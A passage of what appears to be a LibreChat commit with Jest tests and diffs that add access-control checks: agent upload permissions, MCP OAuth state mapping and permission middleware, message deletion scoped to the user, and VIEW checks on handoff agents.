await AclEntry.deleteMany({});
authorId = new mongoose.Types.ObjectId();
otherUserId = new mongoose.Types.ObjectId();
agentCustomId = `agent_${uuidv4().replace(/-/g, '').substring(0, 21)}`;
await User.create({ _id: authorId, username: 'author', email: 'author@test.com' });
await User.create({ _id: otherUserId, username: 'other', email: 'other@test.com' });
jest.clearAllMocks();
});
const createAppWithUser = (userId, userRole = SystemRoles.USER) => {
const app = express();
app.use(express.json());
app.use((req, _res, next) => {
if (req.method === 'POST') {
req.file = {
originalname: 'test.png',
mimetype: 'image/png',
size: 100,
path: '/tmp/t.png',
filename: 'test.png',
};
req.file_id = uuidv4();
}
next();
});
app.use((req, _res, next) => {
req.user = { id: userId.toString(), role: userRole };
req.app = { locals: {} };
req.config = { fileStrategy: 'local', paths: { imageOutput: '/tmp/images' } };
next();
});
app.use('/images', router);
return app;
};
it('should return 403 when user has no permission on agent', async () => {
await createAgent({
id: agentCustomId,
name: 'Test Agent',
provider: 'openai',
model: 'gpt-4',
author: authorId,
});
const app = createAppWithUser(otherUserId);
const response = await request(app).post('/images').send({
endpoint: 'agents',
agent_id: agentCustomId,
tool_resource: 'context',
file_id: uuidv4(),
});
expect(response.status).toBe(403);
expect(response.body.error).toBe('Forbidden');
expect(processAgentFileUpload).not.toHaveBeenCalled();
expect(fs.promises.unlink).toHaveBeenCalledWith('/tmp/t.png');
});
it('should allow upload for agent owner', async () => {
await createAgent({
id: agentCustomId,
name: 'Test Agent',
provider: 'openai',
model: 'gpt-4',
author: authorId,
});
const app = createAppWithUser(authorId);
const response = await request(app).post('/images').send({
endpoint: 'agents',
agent_id: agentCustomId,
tool_resource: 'context',
file_id: uuidv4(),
});
expect(response.status).toBe(200);
expect(processAgentFileUpload).toHaveBeenCalled();
});
it('should allow upload for admin regardless of ownership', async () => {
await createAgent({
id: agentCustomId,
name: 'Test Agent',
provider: 'openai',
model: 'gpt-4',
author: authorId,
});
const app = createAppWithUser(otherUserId, SystemRoles.ADMIN);
const response = await request(app).post('/images').send({
endpoint: 'agents',
agent_id: agentCustomId,
tool_resource: 'context',
file_id: uuidv4(),
});
expect(response.status).toBe(200);
expect(processAgentFileUpload).toHaveBeenCalled();
});
it('should allow upload for user with EDIT permission', async () => {
const agent = await createAgent({
id: agentCustomId,
name: 'Test Agent',
provider: 'openai',
model: 'gpt-4',
author: authorId,
});
const { grantPermission } = require('~/server/services/PermissionService');
await grantPermission({
principalType: PrincipalType.USER,
principalId: otherUserId,
resourceType: ResourceType.AGENT,
resourceId: agent._id,
accessRoleId: AccessRoleIds.AGENT_EDITOR,
grantedBy: authorId,
});
const app = createAppWithUser(otherUserId);
const response = await request(app).post('/images').send({
endpoint: 'agents',
agent_id: agentCustomId,
tool_resource: 'context',
file_id: uuidv4(),
});
expect(response.status).toBe(200);
expect(processAgentFileUpload).toHaveBeenCalled();
});
it('should deny upload for user with only VIEW permission', async () => {
const agent = await createAgent({
id: agentCustomId,
name: 'Test Agent',
provider: 'openai',
model: 'gpt-4',
author: authorId,
});
const { grantPermission } = require('~/server/services/PermissionService');
await grantPermission({
principalType: PrincipalType.USER,
principalId: otherUserId,
resourceType: ResourceType.AGENT,
resourceId: agent._id,
accessRoleId: AccessRoleIds.AGENT_VIEWER,
grantedBy: authorId,
});
const app = createAppWithUser(otherUserId);
const response = await request(app).post('/images').send({
endpoint: 'agents',
agent_id: agentCustomId,
tool_resource: 'context',
file_id: uuidv4(),
});
expect(response.status).toBe(403);
expect(response.body.error).toBe('Forbidden');
expect(processAgentFileUpload).not.toHaveBeenCalled();
expect(fs.promises.unlink).toHaveBeenCalledWith('/tmp/t.png');
});
it('should skip permission check for regular image uploads without agent_id/tool_resource', async () => {
const app = createAppWithUser(otherUserId);
const response = await request(app).post('/images').send({
endpoint: 'agents',
file_id: uuidv4(),
});
expect(response.status).toBe(200);
});
it('should return 404 for non-existent agent', async () => {
const app = createAppWithUser(otherUserId);
const response = await request(app).post('/images').send({
endpoint: 'agents',
agent_id: 'agent_nonexistent123456789',
tool_resource: 'context',
file_id: uuidv4(),
});
expect(response.status).toBe(404);
expect(response.body.error).toBe('Not Found');
expect(processAgentFileUpload).not.toHaveBeenCalled();
expect(fs.promises.unlink).toHaveBeenCalledWith('/tmp/t.png');
});
it('should allow message_file attachment (boolean true) without EDIT permission', async () => {
const agent = await createAgent({
id: agentCustomId,
name: 'Test Agent',
provider: 'openai',
model: 'gpt-4',
author: authorId,
});
const { grantPermission } = require('~/server/services/PermissionService');
await grantPermission({
principalType: PrincipalType.USER,
principalId: otherUserId,
resourceType: ResourceType.AGENT,
resourceId: agent._id,
accessRoleId: AccessRoleIds.AGENT_VIEWER,
grantedBy: authorId,
});
const app = createAppWithUser(otherUserId);
const response = await request(app).post('/images').send({
endpoint: 'agents',
agent_id: agentCustomId,
tool_resource: 'context',
message_file: true,
file_id: uuidv4(),
});
expect(response.status).toBe(200);
expect(processAgentFileUpload).toHaveBeenCalled();
});
it('should allow message_file attachment (string "true") without EDIT permission', async () => {
const agent = await createAgent({
id: agentCustomId,
name: 'Test Agent',
provider: 'openai',
model: 'gpt-4',
author: authorId,
});
const { grantPermission } = require('~/server/services/PermissionService');
await grantPermission({
principalType: PrincipalType.USER,
principalId: otherUserId,
resourceType: ResourceType.AGENT,
resourceId: agent._id,
accessRoleId: AccessRoleIds.AGENT_VIEWER,
grantedBy: authorId,
});
const app = createAppWithUser(otherUserId);
const response = await request(app).post('/images').send({
endpoint: 'agents',
agent_id: agentCustomId,
tool_resource: 'context',
message_file: 'true',
file_id: uuidv4(),
});
expect(response.status).toBe(200);
expect(processAgentFileUpload).toHaveBeenCalled();
});
it('should deny upload when message_file is false (not a message attachment)', async () => {
const agent = await createAgent({
id: agentCustomId,
name: 'Test Agent',
provider: 'openai',
model: 'gpt-4',
author: authorId,
});
const { grantPermission } = require('~/server/services/PermissionService');
await grantPermission({
principalType: PrincipalType.USER,
principalId: otherUserId,
resourceType: ResourceType.AGENT,
resourceId: agent._id,
accessRoleId: AccessRoleIds.AGENT_VIEWER,
grantedBy: authorId,
});
const app = createAppWithUser(otherUserId);
const response = await request(app).post('/images').send({
endpoint: 'agents',
agent_id: agentCustomId,
tool_resource: 'context',
message_file: false,
file_id: uuidv4(),
});
expect(response.status).toBe(403);
expect(response.body.error).toBe('Forbidden');
expect(processAgentFileUpload).not.toHaveBeenCalled();
expect(fs.promises.unlink).toHaveBeenCalledWith('/tmp/t.png');
});
});
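The permission gate these tests exercise can be sketched as a small standalone check. All names below (`verifyUploadPermissionSketch`, the injected `getAgent`/`checkPermission` helpers) are illustrative stand-ins, not the actual LibreChat implementation:

```javascript
// Illustrative sketch of an agent-upload permission gate, assuming
// hypothetical getAgent/checkPermission helpers injected by the caller.
async function verifyUploadPermissionSketch({ user, metadata, getAgent, checkPermission }) {
  // Message attachments bypass the EDIT check (mirrors message_file in the tests,
  // which accepts both boolean true and the string 'true').
  if (metadata.message_file === true || metadata.message_file === 'true') {
    return { denied: false };
  }
  const agent = await getAgent({ id: metadata.agent_id });
  if (!agent) {
    return { denied: true, status: 404, error: 'Not Found' };
  }
  // Admins and the agent's author are always allowed.
  if (user.role === 'ADMIN' || String(agent.author) === user.id) {
    return { denied: false };
  }
  // Otherwise require an explicit EDIT-level grant.
  const canEdit = await checkPermission({ userId: user.id, resourceId: agent._id });
  return canEdit ? { denied: false } : { denied: true, status: 403, error: 'Forbidden' };
}
```

A denying result would correspond to the 403/404 responses (and the temp-file `unlink`) asserted above; an allowing result lets the upload proceed to `processAgentFileUpload`.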


@@ -2,12 +2,15 @@ const path = require('path');
 const fs = require('fs').promises;
 const express = require('express');
 const { logger } = require('@librechat/data-schemas');
+const { verifyAgentUploadPermission } = require('@librechat/api');
 const { isAssistantsEndpoint } = require('librechat-data-provider');
 const {
   processAgentFileUpload,
   processImageFile,
   filterFile,
 } = require('~/server/services/Files/process');
+const { checkPermission } = require('~/server/services/PermissionService');
+const { getAgent } = require('~/models/Agent');
 const router = express.Router();
@@ -22,6 +25,16 @@ router.post('/', async (req, res) => {
   metadata.file_id = req.file_id;
 
   if (!isAssistantsEndpoint(metadata.endpoint) && metadata.tool_resource != null) {
+    const denied = await verifyAgentUploadPermission({
+      req,
+      res,
+      metadata,
+      getAgent,
+      checkPermission,
+    });
+    if (denied) {
+      return;
+    }
     return await processAgentFileUpload({ req, res, metadata });
   }


@@ -13,6 +13,7 @@ const {
   MCPOAuthHandler,
   MCPTokenStorage,
   setOAuthSession,
+  PENDING_STALE_MS,
   getUserMCPAuthMap,
   validateOAuthCsrf,
   OAUTH_CSRF_COOKIE,
@@ -49,6 +50,18 @@ const router = Router();
 const OAUTH_CSRF_COOKIE_PATH = '/api/mcp';
 
+const checkMCPUsePermissions = generateCheckAccess({
+  permissionType: PermissionTypes.MCP_SERVERS,
+  permissions: [Permissions.USE],
+  getRoleByName,
+});
+
+const checkMCPCreate = generateCheckAccess({
+  permissionType: PermissionTypes.MCP_SERVERS,
+  permissions: [Permissions.USE, Permissions.CREATE],
+  getRoleByName,
+});
+
 /**
  * Get all MCP tools available to the user
  * Returns only MCP tools, completely decoupled from regular LibreChat tools
@@ -91,7 +104,11 @@ router.get('/:serverName/oauth/initiate', requireJwtAuth, setOAuthSession, async
     }
 
     const oauthHeaders = await getOAuthHeaders(serverName, userId);
-    const { authorizationUrl, flowId: oauthFlowId } = await MCPOAuthHandler.initiateOAuthFlow(
+    const {
+      authorizationUrl,
+      flowId: oauthFlowId,
+      flowMetadata,
+    } = await MCPOAuthHandler.initiateOAuthFlow(
       serverName,
       serverUrl,
       userId,
@@ -101,6 +118,7 @@ router.get('/:serverName/oauth/initiate', requireJwtAuth, setOAuthSession, async
     logger.debug('[MCP OAuth] OAuth flow initiated', { oauthFlowId, authorizationUrl });
 
+    await MCPOAuthHandler.storeStateMapping(flowMetadata.state, oauthFlowId, flowManager);
     setOAuthCsrfCookie(res, oauthFlowId, OAUTH_CSRF_COOKIE_PATH);
     res.redirect(authorizationUrl);
   } catch (error) {
@@ -143,30 +161,52 @@ router.get('/:serverName/oauth/callback', async (req, res) => {
     return res.redirect(`${basePath}/oauth/error?error=missing_state`);
   }
 
-  const flowId = state;
-  logger.debug('[MCP OAuth] Using flow ID from state', { flowId });
+  const flowsCache = getLogStores(CacheKeys.FLOWS);
+  const flowManager = getFlowStateManager(flowsCache);
+  const flowId = await MCPOAuthHandler.resolveStateToFlowId(state, flowManager);
+  if (!flowId) {
+    logger.error('[MCP OAuth] Could not resolve state to flow ID', { state });
+    return res.redirect(`${basePath}/oauth/error?error=invalid_state`);
+  }
+  logger.debug('[MCP OAuth] Resolved flow ID from state', { flowId });
 
   const flowParts = flowId.split(':');
   if (flowParts.length < 2 || !flowParts[0] || !flowParts[1]) {
-    logger.error('[MCP OAuth] Invalid flow ID format in state', { flowId });
+    logger.error('[MCP OAuth] Invalid flow ID format', { flowId });
     return res.redirect(`${basePath}/oauth/error?error=invalid_state`);
   }
   const [flowUserId] = flowParts;
 
-  if (
-    !validateOAuthCsrf(req, res, flowId, OAUTH_CSRF_COOKIE_PATH) &&
-    !validateOAuthSession(req, flowUserId)
-  ) {
-    logger.error('[MCP OAuth] CSRF validation failed: no valid CSRF or session cookie', {
-      flowId,
-      hasCsrfCookie: !!req.cookies?.[OAUTH_CSRF_COOKIE],
-      hasSessionCookie: !!req.cookies?.[OAUTH_SESSION_COOKIE],
-    });
-    return res.redirect(`${basePath}/oauth/error?error=csrf_validation_failed`);
+  const hasCsrf = validateOAuthCsrf(req, res, flowId, OAUTH_CSRF_COOKIE_PATH);
+  const hasSession = !hasCsrf && validateOAuthSession(req, flowUserId);
+  let hasActiveFlow = false;
+  if (!hasCsrf && !hasSession) {
+    const pendingFlow = await flowManager.getFlowState(flowId, 'mcp_oauth');
+    const pendingAge = pendingFlow?.createdAt ? Date.now() - pendingFlow.createdAt : Infinity;
+    hasActiveFlow = pendingFlow?.status === 'PENDING' && pendingAge < PENDING_STALE_MS;
+    if (hasActiveFlow) {
+      logger.debug(
+        '[MCP OAuth] CSRF/session cookies absent, validating via active PENDING flow',
+        {
+          flowId,
+        },
+      );
+    }
   }
 
-  const flowsCache = getLogStores(CacheKeys.FLOWS);
-  const flowManager = getFlowStateManager(flowsCache);
+  if (!hasCsrf && !hasSession && !hasActiveFlow) {
+    logger.error(
+      '[MCP OAuth] CSRF validation failed: no valid CSRF cookie, session cookie, or active flow',
+      {
+        flowId,
+        hasCsrfCookie: !!req.cookies?.[OAUTH_CSRF_COOKIE],
+        hasSessionCookie: !!req.cookies?.[OAUTH_SESSION_COOKIE],
+      },
+    );
+    return res.redirect(`${basePath}/oauth/error?error=csrf_validation_failed`);
+  }
 
   logger.debug('[MCP OAuth] Getting flow state for flowId: ' + flowId);
   const flowState = await MCPOAuthHandler.getFlowState(flowId, flowManager);
@@ -281,7 +321,13 @@ router.get('/:serverName/oauth/callback', async (req, res) => {
     const toolFlowId = flowState.metadata?.toolFlowId;
     if (toolFlowId) {
       logger.debug('[MCP OAuth] Completing tool flow', { toolFlowId });
-      await flowManager.completeFlow(toolFlowId, 'mcp_oauth', tokens);
+      const completed = await flowManager.completeFlow(toolFlowId, 'mcp_oauth', tokens);
+      if (!completed) {
+        logger.warn(
+          '[MCP OAuth] Tool flow state not found during completion — waiter will time out',
+          { toolFlowId },
+        );
+      }
     }
 
     /** Redirect to success page with flowId and serverName */
@@ -436,69 +482,75 @@ router.post('/oauth/cancel/:serverName', requireJwtAuth, async (req, res) => {
 /**
  * Reinitialize MCP server
  * This endpoint allows reinitializing a specific MCP server
  */
-router.post('/:serverName/reinitialize', requireJwtAuth, setOAuthSession, async (req, res) => {
-  try {
-    const { serverName } = req.params;
-    const user = createSafeUser(req.user);
-
-    if (!user.id) {
-      return res.status(401).json({ error: 'User not authenticated' });
-    }
-
-    logger.info(`[MCP Reinitialize] Reinitializing server: ${serverName}`);
-
-    const mcpManager = getMCPManager();
-    const serverConfig = await getMCPServersRegistry().getServerConfig(serverName, user.id);
-    if (!serverConfig) {
-      return res.status(404).json({
-        error: `MCP server '${serverName}' not found in configuration`,
-      });
-    }
-
-    await mcpManager.disconnectUserConnection(user.id, serverName);
-    logger.info(
-      `[MCP Reinitialize] Disconnected existing user connection for server: ${serverName}`,
-    );
-
-    /** @type {Record<string, Record<string, string>> | undefined} */
-    let userMCPAuthMap;
-    if (serverConfig.customUserVars && typeof serverConfig.customUserVars === 'object') {
-      userMCPAuthMap = await getUserMCPAuthMap({
-        userId: user.id,
-        servers: [serverName],
-        findPluginAuthsByKeys,
-      });
-    }
-
-    const result = await reinitMCPServer({
-      user,
-      serverName,
-      userMCPAuthMap,
-    });
-
-    if (!result) {
-      return res.status(500).json({ error: 'Failed to reinitialize MCP server for user' });
-    }
-
-    const { success, message, oauthRequired, oauthUrl } = result;
-
-    if (oauthRequired) {
-      const flowId = MCPOAuthHandler.generateFlowId(user.id, serverName);
-      setOAuthCsrfCookie(res, flowId, OAUTH_CSRF_COOKIE_PATH);
-    }
-
-    res.json({
-      success,
-      message,
-      oauthUrl,
-      serverName,
-      oauthRequired,
-    });
-  } catch (error) {
-    logger.error('[MCP Reinitialize] Unexpected error', error);
-    res.status(500).json({ error: 'Internal server error' });
-  }
-});
+router.post(
+  '/:serverName/reinitialize',
+  requireJwtAuth,
+  checkMCPUsePermissions,
+  setOAuthSession,
+  async (req, res) => {
+    try {
+      const { serverName } = req.params;
+      const user = createSafeUser(req.user);
+
+      if (!user.id) {
+        return res.status(401).json({ error: 'User not authenticated' });
+      }
+
+      logger.info(`[MCP Reinitialize] Reinitializing server: ${serverName}`);
+
+      const mcpManager = getMCPManager();
+      const serverConfig = await getMCPServersRegistry().getServerConfig(serverName, user.id);
+      if (!serverConfig) {
+        return res.status(404).json({
+          error: `MCP server '${serverName}' not found in configuration`,
+        });
+      }
+
+      await mcpManager.disconnectUserConnection(user.id, serverName);
+      logger.info(
+        `[MCP Reinitialize] Disconnected existing user connection for server: ${serverName}`,
+      );
+
+      /** @type {Record<string, Record<string, string>> | undefined} */
+      let userMCPAuthMap;
+      if (serverConfig.customUserVars && typeof serverConfig.customUserVars === 'object') {
+        userMCPAuthMap = await getUserMCPAuthMap({
+          userId: user.id,
+          servers: [serverName],
+          findPluginAuthsByKeys,
+        });
+      }
+
+      const result = await reinitMCPServer({
+        user,
+        serverName,
+        userMCPAuthMap,
+      });
+
+      if (!result) {
+        return res.status(500).json({ error: 'Failed to reinitialize MCP server for user' });
+      }
+
+      const { success, message, oauthRequired, oauthUrl } = result;
+
+      if (oauthRequired) {
+        const flowId = MCPOAuthHandler.generateFlowId(user.id, serverName);
+        setOAuthCsrfCookie(res, flowId, OAUTH_CSRF_COOKIE_PATH);
+      }
+
+      res.json({
+        success,
+        message,
+        oauthUrl,
+        serverName,
+        oauthRequired,
+      });
+    } catch (error) {
+      logger.error('[MCP Reinitialize] Unexpected error', error);
+      res.status(500).json({ error: 'Internal server error' });
+    }
+  },
+);
 
 /**
  * Get connection status for all MCP servers
@@ -605,7 +657,7 @@ router.get('/connection/status/:serverName', requireJwtAuth, async (req, res) =>
  * Check which authentication values exist for a specific MCP server
  * This endpoint returns only boolean flags indicating if values are set, not the actual values
  */
-router.get('/:serverName/auth-values', requireJwtAuth, async (req, res) => {
+router.get('/:serverName/auth-values', requireJwtAuth, checkMCPUsePermissions, async (req, res) => {
   try {
     const { serverName } = req.params;
     const user = req.user;
@@ -662,19 +714,6 @@ async function getOAuthHeaders(serverName, userId) {
   MCP Server CRUD Routes (User-Managed MCP Servers)
 */
 
-// Permission checkers for MCP server management
-const checkMCPUsePermissions = generateCheckAccess({
-  permissionType: PermissionTypes.MCP_SERVERS,
-  permissions: [Permissions.USE],
-  getRoleByName,
-});
-
-const checkMCPCreate = generateCheckAccess({
-  permissionType: PermissionTypes.MCP_SERVERS,
-  permissions: [Permissions.USE, Permissions.CREATE],
-  getRoleByName,
-});
-
 /**
  * Get list of accessible MCP servers
  * @route GET /api/mcp/servers


@@ -404,8 +404,8 @@ router.put('/:conversationId/:messageId/feedback', validateMessageReq, async (re
 router.delete('/:conversationId/:messageId', validateMessageReq, async (req, res) => {
   try {
-    const { messageId } = req.params;
-    await deleteMessages({ messageId });
+    const { conversationId, messageId } = req.params;
+    await deleteMessages({ messageId, conversationId, user: req.user.id });
     res.status(204).send();
   } catch (error) {
     logger.error('Error deleting message:', error);


@@ -1,6 +1,7 @@
 const { logger } = require('@librechat/data-schemas');
 const { initializeAgent, validateAgentModel } = require('@librechat/api');
 const { loadAddedAgent, setGetAgent, ADDED_AGENT_ID } = require('~/models/loadAddedAgent');
+const { filterFilesByAgentAccess } = require('~/server/services/Files/permissions');
 const { getConvoFiles } = require('~/models/Conversation');
 const { getAgent } = require('~/models/Agent');
 const db = require('~/models');

@@ -108,6 +109,7 @@ const processAddedConvo = async ({
       getUserKeyValues: db.getUserKeyValues,
       getToolFilesByIds: db.getToolFilesByIds,
       getCodeGeneratedFiles: db.getCodeGeneratedFiles,
+      filterFilesByAgentAccess,
     },
   );


@@ -10,6 +10,8 @@ const {
   createSequentialChainEdges,
 } = require('@librechat/api');
 const {
+  ResourceType,
+  PermissionBits,
   EModelEndpoint,
   isAgentsEndpoint,
   getResponseSender,

@@ -20,7 +22,9 @@ const {
   getDefaultHandlers,
 } = require('~/server/controllers/agents/callbacks');
 const { loadAgentTools, loadToolsForExecution } = require('~/server/services/ToolService');
+const { filterFilesByAgentAccess } = require('~/server/services/Files/permissions');
 const { getModelsConfig } = require('~/server/controllers/ModelController');
+const { checkPermission } = require('~/server/services/PermissionService');
 const AgentClient = require('~/server/controllers/agents/client');
 const { getConvoFiles } = require('~/models/Conversation');
 const { processAddedConvo } = require('./addedConvo');

@@ -125,6 +129,7 @@ const initializeClient = async ({ req, res, signal, endpointOption }) => {
         toolRegistry: ctx.toolRegistry,
         userMCPAuthMap: ctx.userMCPAuthMap,
         tool_resources: ctx.tool_resources,
+        actionsEnabled: ctx.actionsEnabled,
       });
 
       logger.debug(`[ON_TOOL_EXECUTE] loaded ${result.loadedTools?.length ?? 0} tools`);

@@ -200,6 +205,7 @@ const initializeClient = async ({ req, res, signal, endpointOption }) => {
       getUserCodeFiles: db.getUserCodeFiles,
       getToolFilesByIds: db.getToolFilesByIds,
       getCodeGeneratedFiles: db.getCodeGeneratedFiles,
+      filterFilesByAgentAccess,
     },
   );

@@ -211,6 +217,7 @@ const initializeClient = async ({ req, res, signal, endpointOption }) => {
     toolRegistry: primaryConfig.toolRegistry,
     userMCPAuthMap: primaryConfig.userMCPAuthMap,
     tool_resources: primaryConfig.tool_resources,
+    actionsEnabled: primaryConfig.actionsEnabled,
   });
 
   const agent_ids = primaryConfig.agent_ids;

@@ -229,6 +236,22 @@ const initializeClient = async ({ req, res, signal, endpointOption }) => {
       return null;
     }
 
+    const hasAccess = await checkPermission({
+      userId: req.user.id,
+      role: req.user.role,
+      resourceType: ResourceType.AGENT,
+      resourceId: agent._id,
+      requiredPermission: PermissionBits.VIEW,
+    });
+    if (!hasAccess) {
+      logger.warn(
+        `[processAgent] User ${req.user.id} lacks VIEW access to handoff agent ${agentId}, skipping`,
+      );
+      skippedAgentIds.add(agentId);
+      return null;
+    }
+
     const validationResult = await validateAgentModel({
       req,
       res,

@@ -263,6 +286,7 @@ const initializeClient = async ({ req, res, signal, endpointOption }) => {
       getUserCodeFiles: db.getUserCodeFiles,
       getToolFilesByIds: db.getToolFilesByIds,
       getCodeGeneratedFiles: db.getCodeGeneratedFiles,
+      filterFilesByAgentAccess,
     },
   );

@@ -278,6 +302,7 @@ const initializeClient = async ({ req, res, signal, endpointOption }) => {
       toolRegistry: config.toolRegistry,
       userMCPAuthMap: config.userMCPAuthMap,
       tool_resources: config.tool_resources,
+      actionsEnabled: config.actionsEnabled,
     });
 
     agentConfigs.set(agentId, config);

@@ -351,6 +376,19 @@ const initializeClient = async ({ req, res, signal, endpointOption }) => {
     userMCPAuthMap = updatedMCPAuthMap;
   }
 
+  for (const [agentId, config] of agentConfigs) {
+    if (agentToolContexts.has(agentId)) {
+      continue;
+    }
+    agentToolContexts.set(agentId, {
+      agent: config,
+      toolRegistry: config.toolRegistry,
+      userMCPAuthMap: config.userMCPAuthMap,
+      tool_resources: config.tool_resources,
+      actionsEnabled: config.actionsEnabled,
+    });
+  }
+
   // Ensure edges is an array when we have multiple agents (multi-agent mode)
   // MultiAgentGraph.categorizeEdges requires edges to be iterable
   if (agentConfigs.size > 0 && !edges) {


@@ -0,0 +1,201 @@
const mongoose = require('mongoose');
const {
ResourceType,
PermissionBits,
PrincipalType,
PrincipalModel,
} = require('librechat-data-provider');
const { MongoMemoryServer } = require('mongodb-memory-server');
const mockInitializeAgent = jest.fn();
const mockValidateAgentModel = jest.fn();
jest.mock('@librechat/agents', () => ({
...jest.requireActual('@librechat/agents'),
createContentAggregator: jest.fn(() => ({
contentParts: [],
aggregateContent: jest.fn(),
})),
}));
jest.mock('@librechat/api', () => ({
...jest.requireActual('@librechat/api'),
initializeAgent: (...args) => mockInitializeAgent(...args),
validateAgentModel: (...args) => mockValidateAgentModel(...args),
GenerationJobManager: { setCollectedUsage: jest.fn() },
getCustomEndpointConfig: jest.fn(),
createSequentialChainEdges: jest.fn(),
}));
jest.mock('~/server/controllers/agents/callbacks', () => ({
createToolEndCallback: jest.fn(() => jest.fn()),
getDefaultHandlers: jest.fn(() => ({})),
}));
jest.mock('~/server/services/ToolService', () => ({
loadAgentTools: jest.fn(),
loadToolsForExecution: jest.fn(),
}));
jest.mock('~/server/controllers/ModelController', () => ({
getModelsConfig: jest.fn().mockResolvedValue({}),
}));
let agentClientArgs;
jest.mock('~/server/controllers/agents/client', () => {
return jest.fn().mockImplementation((args) => {
agentClientArgs = args;
return {};
});
});
jest.mock('./addedConvo', () => ({
processAddedConvo: jest.fn().mockResolvedValue({ userMCPAuthMap: undefined }),
}));
jest.mock('~/cache', () => ({
logViolation: jest.fn(),
}));
const { initializeClient } = require('./initialize');
const { createAgent } = require('~/models/Agent');
const { User, AclEntry } = require('~/db/models');
const PRIMARY_ID = 'agent_primary';
const TARGET_ID = 'agent_target';
const AUTHORIZED_ID = 'agent_authorized';
describe('initializeClient — processAgent ACL gate', () => {
let mongoServer;
let testUser;
beforeAll(async () => {
mongoServer = await MongoMemoryServer.create();
await mongoose.connect(mongoServer.getUri());
});
afterAll(async () => {
await mongoose.disconnect();
await mongoServer.stop();
});
beforeEach(async () => {
await mongoose.connection.dropDatabase();
jest.clearAllMocks();
agentClientArgs = undefined;
testUser = await User.create({
email: 'test@example.com',
name: 'Test User',
username: 'testuser',
role: 'USER',
});
mockValidateAgentModel.mockResolvedValue({ isValid: true });
});
const makeReq = () => ({
user: { id: testUser._id.toString(), role: 'USER' },
body: { conversationId: 'conv_1', files: [] },
config: { endpoints: {} },
_resumableStreamId: null,
});
const makeEndpointOption = () => ({
agent: Promise.resolve({
id: PRIMARY_ID,
name: 'Primary',
provider: 'openai',
model: 'gpt-4',
tools: [],
}),
model_parameters: { model: 'gpt-4' },
endpoint: 'agents',
});
const makePrimaryConfig = (edges) => ({
id: PRIMARY_ID,
endpoint: 'agents',
edges,
toolDefinitions: [],
toolRegistry: new Map(),
userMCPAuthMap: null,
tool_resources: {},
resendFiles: true,
maxContextTokens: 4096,
});
it('should skip handoff agent and filter its edge when user lacks VIEW access', async () => {
await createAgent({
id: TARGET_ID,
name: 'Target Agent',
provider: 'openai',
model: 'gpt-4',
author: new mongoose.Types.ObjectId(),
tools: [],
});
const edges = [{ from: PRIMARY_ID, to: TARGET_ID, edgeType: 'handoff' }];
mockInitializeAgent.mockResolvedValue(makePrimaryConfig(edges));
await initializeClient({
req: makeReq(),
res: {},
signal: new AbortController().signal,
endpointOption: makeEndpointOption(),
});
expect(mockInitializeAgent).toHaveBeenCalledTimes(1);
expect(agentClientArgs.agent.edges).toEqual([]);
});
it('should initialize handoff agent and keep its edge when user has VIEW access', async () => {
const authorizedAgent = await createAgent({
id: AUTHORIZED_ID,
name: 'Authorized Agent',
provider: 'openai',
model: 'gpt-4',
author: new mongoose.Types.ObjectId(),
tools: [],
});
await AclEntry.create({
principalType: PrincipalType.USER,
principalId: testUser._id,
principalModel: PrincipalModel.USER,
resourceType: ResourceType.AGENT,
resourceId: authorizedAgent._id,
permBits: PermissionBits.VIEW,
grantedBy: testUser._id,
});
const edges = [{ from: PRIMARY_ID, to: AUTHORIZED_ID, edgeType: 'handoff' }];
const handoffConfig = {
id: AUTHORIZED_ID,
edges: [],
toolDefinitions: [],
toolRegistry: new Map(),
userMCPAuthMap: null,
tool_resources: {},
};
let callCount = 0;
mockInitializeAgent.mockImplementation(() => {
callCount++;
return callCount === 1
? Promise.resolve(makePrimaryConfig(edges))
: Promise.resolve(handoffConfig);
});
await initializeClient({
req: makeReq(),
res: {},
signal: new AbortController().signal,
endpointOption: makeEndpointOption(),
});
expect(mockInitializeAgent).toHaveBeenCalledTimes(2);
expect(agentClientArgs.agent.edges).toHaveLength(1);
expect(agentClientArgs.agent.edges[0].to).toBe(AUTHORIZED_ID);
});
});
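The edge-filtering behavior asserted above (drop handoff edges whose target the user cannot VIEW, keep authorized ones) can be sketched as a standalone helper. `filterHandoffEdges` and the `canView` predicate are illustrative names, not the actual initialize.js internals:

```javascript
// Illustrative sketch: drop handoff edges whose target agent the user
// cannot VIEW. `canView` is a hypothetical async permission predicate
// (e.g. backed by an ACL lookup like the AclEntry records above).
async function filterHandoffEdges(edges, canView) {
  const kept = [];
  for (const edge of edges) {
    // Non-handoff edges pass through; handoff edges require VIEW on the target.
    if (edge.edgeType !== 'handoff' || (await canView(edge.to))) {
      kept.push(edge);
    }
  }
  return kept;
}
```

With this shape, the first test's unauthorized target yields an empty edge list, while the second test's granted target survives the filter.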


@@ -0,0 +1,124 @@
jest.mock('uuid', () => ({ v4: jest.fn(() => 'mock-uuid') }));
jest.mock('@librechat/data-schemas', () => ({
logger: { warn: jest.fn(), debug: jest.fn(), error: jest.fn() },
}));
jest.mock('@librechat/agents', () => ({
getCodeBaseURL: jest.fn(() => 'http://localhost:8000'),
}));
const mockSanitizeFilename = jest.fn();
jest.mock('@librechat/api', () => ({
logAxiosError: jest.fn(),
getBasePath: jest.fn(() => ''),
sanitizeFilename: mockSanitizeFilename,
}));
jest.mock('librechat-data-provider', () => ({
...jest.requireActual('librechat-data-provider'),
mergeFileConfig: jest.fn(() => ({ serverFileSizeLimit: 100 * 1024 * 1024 })),
getEndpointFileConfig: jest.fn(() => ({
fileSizeLimit: 100 * 1024 * 1024,
supportedMimeTypes: ['*/*'],
})),
fileConfig: { checkType: jest.fn(() => true) },
}));
jest.mock('~/models', () => ({
createFile: jest.fn().mockResolvedValue({}),
getFiles: jest.fn().mockResolvedValue([]),
updateFile: jest.fn(),
claimCodeFile: jest.fn().mockResolvedValue({ file_id: 'mock-uuid', usage: 0 }),
}));
const mockSaveBuffer = jest.fn().mockResolvedValue('/uploads/user123/mock-uuid__output.csv');
jest.mock('~/server/services/Files/strategies', () => ({
getStrategyFunctions: jest.fn(() => ({
saveBuffer: mockSaveBuffer,
})),
}));
jest.mock('~/server/services/Files/permissions', () => ({
filterFilesByAgentAccess: jest.fn().mockResolvedValue([]),
}));
jest.mock('~/server/services/Files/images/convert', () => ({
convertImage: jest.fn(),
}));
jest.mock('~/server/utils', () => ({
determineFileType: jest.fn().mockResolvedValue({ mime: 'text/csv' }),
}));
jest.mock('axios', () =>
jest.fn().mockResolvedValue({
data: Buffer.from('file-content'),
}),
);
const { createFile } = require('~/models');
const { processCodeOutput } = require('../process');
const baseParams = {
req: {
user: { id: 'user123' },
config: {
fileStrategy: 'local',
imageOutputType: 'webp',
fileConfig: {},
},
},
